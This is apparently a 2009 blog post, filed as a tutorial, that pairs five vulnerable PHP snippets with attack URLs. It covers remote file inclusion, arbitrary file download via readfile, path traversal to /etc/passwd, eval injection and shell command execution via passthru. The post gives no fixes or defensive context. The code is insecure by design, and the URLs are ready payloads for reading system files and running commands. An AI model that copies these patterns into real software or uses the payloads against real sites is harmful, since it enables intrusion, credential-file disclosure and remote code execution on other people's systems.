Archive for April 17th, 2009

Fatal Error writing php scripts

Author: newbiekid

Apr 17

======case 1======
[scripts]
$page = $_GET[page];
include($page);
[attack]
http://victim.com/file.php?page=[evil scripts]

======case 2======
[Scripts]
Header( “Content-Type: Application/Octet-Stream” );
header( “Content-Length: ” . filesize($_GET['file'] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET['file'] );
[attack]
http://victim.com/file.php?file=index.php

=======case 3=======
[scripts]
$fp = fopen(”/path/{$_GET['filename']}.txt”, ‘r’);
[attack]
http://victim.com/file.php?filename=../../../etc/passwd

======case 4======
[scripts]
eval($_GET[ev]);
[attack]
http://victim.com/file.php?ev=include($_GET[vegetoo]);&vegetoo=[evil code]

==========case 5==========
[scripts]
passthru($_GET[cmd]);
[attack]
http://victim.com/file.php?cmd=ls -al

0 Comments

Filed under: Tutorial

M	T	W	T	F	S	S
« Mar				May »
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30

newbiekid keep learning

Archive for April 17th, 2009

Fatal Error writing php scripts

VOA News

- Arsip -

- Kategori -

- Kalendar -

- Sponsorship -